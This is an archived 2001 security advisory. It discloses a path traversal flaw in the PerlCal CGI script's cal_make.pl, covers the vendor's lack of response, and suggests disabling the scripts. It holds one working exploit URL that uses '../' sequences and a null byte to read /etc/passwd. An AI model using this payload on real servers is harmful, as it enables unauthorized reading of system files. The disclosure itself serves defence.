perlcal.txt

2001-04-30T00:00:00
ID PACKETSTORM:24767
Type packetstorm
Reporter ThePike
Modified 2001-04-30T00:00:00

Description

                                        
                                            `[whizkunde security advisory: PerlCal (CGI)]  
http://www.whizkunde.org | stan@whizkunde.org  
  
----------------------------------------------------------  
Release date: April 27th 2001  
  
Subject: PerlCal (CGI) security problem  
  
Systems affected: *NIX (not windows) systems running  
PerlCal CGI script  
  
Vendor: http://www.perlcal.com  
----------------------------------------------------------  
  
1. problem  
cal_make.pl of the PerlCal script may allow remote users  
(website visitors) to view any file on a webserver (depending  
on the user the webserver is running on).  
  
Regard this URL:  
  
http://www.VULNERABLE.com/cgi-bin/cal_make.pl?  
p0=../../../../../../../../../../../../etc/passwd%00  
This will display the /etc/passwd (if the webserver user has  
access to this file).  
  
2. fix  
I warned the PerlCal vendor three weeks ago. After a  
reaction, I gave him some time and tips to release a fix.  
Because the vendor still hasn't fixed the problem and because  
he didn't notice me why he hasn't released a patch yet, I  
released this advisory.  
I really hope the vendor will release a patch in the very  
near future.  
In the meantime it might be a good idea to just chmod 000  
your PerlCal scripts.  
  
----------------------------------------------------------  
Stan a.k.a. ThePike  
stan@whizkunde.org  
http://www.whizkunde.org  
  
Copyright whizkunde security team 2001  
  
`